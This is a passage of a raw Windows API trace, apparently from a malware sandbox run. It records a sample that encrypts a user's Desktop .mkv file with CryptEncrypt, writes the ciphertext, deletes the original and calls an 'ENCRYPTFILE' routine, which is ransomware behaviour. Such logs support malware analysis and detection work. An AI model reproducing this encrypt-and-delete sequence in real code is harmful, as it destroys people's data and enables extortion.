(hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0125.733] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e27e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0125.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0125.735] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.735] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.735] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0125.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0125.737] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0125.737] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.740] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x16d36, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x16d40) returned 1 [0125.740] CharLowerBuffW (in: lpsz="byte[93505]", cchLength=0xb | out: lpsz="byte[93505]") returned 0xb [0125.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0125.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0125.762] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e790*=0x16d36, dwBufLen=0x16d40 | out: pbData=0x48f0048*, pdwDataLen=0x144e790*=0x16d40) returned 1 [0125.763] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.764] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x16d40, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x16d40, lpOverlapped=0x0) returned 1 [0125.767] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0125.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0125.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0125.767] CryptDestroyKey (hKey=0x41ac640) returned 1 [0125.767] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.768] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0125.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0125.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.768] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0125.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0125.768] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0125.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.768] FreeLibrary (hLibModule=0x756e0000) returned 1 [0125.768] CloseHandle (hObject=0x258) returned 1 [0125.768] CloseHandle (hObject=0x2a0) returned 1 [0125.778] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv", lpFilePart=0x0) returned 0x2d [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0125.778] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\tj494ho-bbcdup1ca.mkv")) returned 0x20 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0125.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0125.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0125.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0125.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0125.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0125.779] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91ac250, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x37ffae10, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x37ffae10, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x16d36, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Tj494Ho-BBcDUp1CA.mkv", cAlternateFileName="TJ494H~1.MKV")) returned 0x41ac740 [0125.779] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tj494Ho-BBcDUp1CA.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\tj494ho-bbcdup1ca.mkv")) returned 1 [0125.789] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91ac250, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x37ffae10, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x37ffae10, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x16d36, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Tj494Ho-BBcDUp1CA.mkv", cAlternateFileName="TJ494H~1.MKV")) returned 0 [0125.793] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0125.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0125.794] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0125.794] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0125.794] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.794] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0125.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0125.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.794] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0125.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 